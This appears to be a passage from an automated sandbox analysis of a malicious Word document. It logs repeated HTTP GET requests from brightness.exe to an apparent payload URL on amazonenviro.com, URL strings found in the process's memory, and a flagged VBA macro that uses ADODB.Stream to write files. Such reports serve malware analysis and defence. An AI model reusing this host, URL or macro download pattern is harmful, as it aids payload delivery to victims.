            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
            Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984089954.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/
            Source: brightness.exe, 00000007.00000002.3373916371.00000000206F3000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984339875.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984089954.000000000070A000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2952466419.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
            Source: brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2233780799.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2341429220.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2277233447.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2930996778.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2449112148.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3027231666.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984339875.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgHVg
            Source: brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgU)
            Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgX
            Source: brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgXXg
            Source: brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgk
            Source: brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgs)I0
            Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/d
            Source: brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg

            System Summary

            barindex
            Source: zYj1wg0cM2.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
